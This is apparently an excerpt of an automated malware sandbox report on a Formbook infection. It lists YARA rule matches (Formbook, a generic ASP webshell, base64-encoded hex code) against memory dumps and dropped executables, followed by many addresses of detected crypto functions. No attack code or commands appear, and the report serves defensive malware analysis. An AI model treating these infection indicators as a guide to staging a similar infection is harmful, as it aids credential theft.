Source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.959380851.0000015595548000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.964474352.000002A0FC393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.440159871.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.438650051.000001C6B5E12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000002.454868060.000001C6B5DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.439308251.000001C6B5DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.449493611.000001C6B5DFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.448788961.000001C6B5DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.438775384.000001C6B5E12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.438537712.000001C6B5DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: wscript.exe PID: 6972, type: MEMORYSTR Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00011030 3_2_00011030
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002EA25 3_2_0002EA25
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00019280 3_2_00019280
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0001DC20 3_2_0001DC20
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00012D90 3_2_00012D90
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002E78A 3_2_0002E78A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002D792 3_2_0002D792
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00012FB0 3_2_00012FB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBB090 3_2_00DBB090
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E720A8 3_2_00E720A8
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD20A0 3_2_00DD20A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61002 3_2_00E61002
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAF900 3_2_00DAF900
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC4120 3_2_00DC4120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E722AE 3_2_00E722AE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6DBD2 3_2_00E6DBD2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDEBB0 3_2_00DDEBB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E72B28 3_2_00E72B28
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DB841F 3_2_00DB841F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBD5E0 3_2_00DBD5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436841F 13_2_0436841F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411002 13_2_04411002
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436B090 13_2_0436B090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_044220A8 13_2_044220A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04350D20 13_2_04350D20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04421D55 13_2_04421D55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04374120 13_2_04374120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435F900 13_2_0435F900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04422D07 13_2_04422D07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04382581 13_2_04382581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436D5E0 13_2_0436D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04376E30 13_2_04376E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04422EF7 13_2_04422EF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_044222AE 13_2_044222AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04422B28 13_2_04422B28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438EBB0 13_2_0438EBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0441DBD2 13_2_0441DBD2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04421FF1 13_2_04421FF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0040DC20 13_2_0040DC20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041EA25 13_2_0041EA25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00409280 13_2_00409280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00402D90 13_2_00402D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041E78A 13_2_0041E78A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041D792 13_2_0041D792
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00402FB0 13_2_00402FB0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008D1030 23_2_008D1030
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008D9280 23_2_008D9280
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EEA25 23_2_008EEA25
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008DDC20 23_2_008DDC20
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008D2D90 23_2_008D2D90
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EE78A 23_2_008EE78A
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008ED792 23_2_008ED792
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008D2FB0 23_2_008D2FB0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105F900 23_2_0105F900
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01074120 23_2_01074120
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01056800 23_2_01056800
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01111002 23_2_01111002
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0112E824 23_2_0112E824
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0107A830 23_2_0107A830
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0106B090 23_2_0106B090
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010820A0 23_2_010820A0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011220A8 23_2_011220A8
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011228EC 23_2_011228EC
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0111231B 23_2_0111231B
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0107A309 23_2_0107A309
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01122B28 23_2_01122B28
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010FCB4F 23_2_010FCB4F
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0107AB40 23_2_0107AB40
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01073360 23_2_01073360
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0108138B 23_2_0108138B
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010FEB8A 23_2_010FEB8A
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0107EB9A 23_2_0107EB9A
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0108EBB0 23_2_0108EBB0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0111DBD2 23_2_0111DBD2
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011103DA 23_2_011103DA
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0108ABD8 23_2_0108ABD8
